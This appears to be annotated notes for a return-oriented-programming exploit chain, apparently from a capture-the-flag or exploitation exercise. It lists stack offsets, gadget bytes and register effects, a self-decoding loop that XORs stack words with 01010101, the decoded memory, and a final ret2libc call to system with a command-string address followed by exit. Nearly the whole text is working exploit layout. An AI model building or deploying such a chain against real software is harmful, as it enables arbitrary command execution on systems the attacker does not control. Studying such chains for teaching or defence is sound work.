- 0 [ST] *POP EBP* | EBP=01010101
- 4 [79] POP ESI | ESI=FFFFFFF6
- 12 [7F] POP EBX | EBX=FFFFFFFF
- 20 [B7] NOT EBX | EBX=00000000
- 24 [A0] NEG ESI | ESI=0000000A
- 28 [81] ADD EBX,ESP | EBX=&BASE[32]
- 32 [84] ADD EBX,20 | EBX=&BASE[52]
- 36 [84] ADD EBX,20 | EBX=&BASE[72]
- 40 [84] ADD EBX,20 | EBX=&BASE[92]
- 44 [AA] MOV DPTR [EBX-4],ESP | BASE[88] = &BASE[48]
- 48 [88] MOV EAX, DPTR [EBX] | EAX = [EBX]
- 52 [9B] XOR EAX, EBP | EAX ^= 01010101
- 56 [A3] MOV DPTR [EBX], EAX | [EBX] = EAX
- 60 [7B] ADD EBX,4 | EBX += 4
- 64 [98] XOR EAX,EAX | EAX = 0
- 68 [8D] SUB ESI, 1 | ESI -= 1
- 72 [A6] RCR EAX, 28 | RCR(EAX, 28) # eax = esi < 0 ? 16 : 0
- 76 [C0] NO-OP (ret gadget) |
- 80 [AE] ADD ESP,EAX | ESP += EAX # if eax == 16 then next esp is 84+16=100
- 84 [9E] POP ESP | ESP = BASE[88]
- for (i in 92..132 step 4) {
- stack[dword i] ^= 01010101
- }
- memory after xor:
- C0 85 04 08 C0 85 04 08 C0 85 04 08
- D0 EC E5 F7
- C0 1E E5 F7
- 38 A0 04 08
- 00 00 00 00
- 92 [C0] NO-OP (ret gadget)
- 96 [C0] NO-OP (ret gadget)
- 100 [C0] NO-OP (ret gadget)
- 104 &system
- 108 &exit
- 112 system arg: 0804A038
- 116 exit arg: 0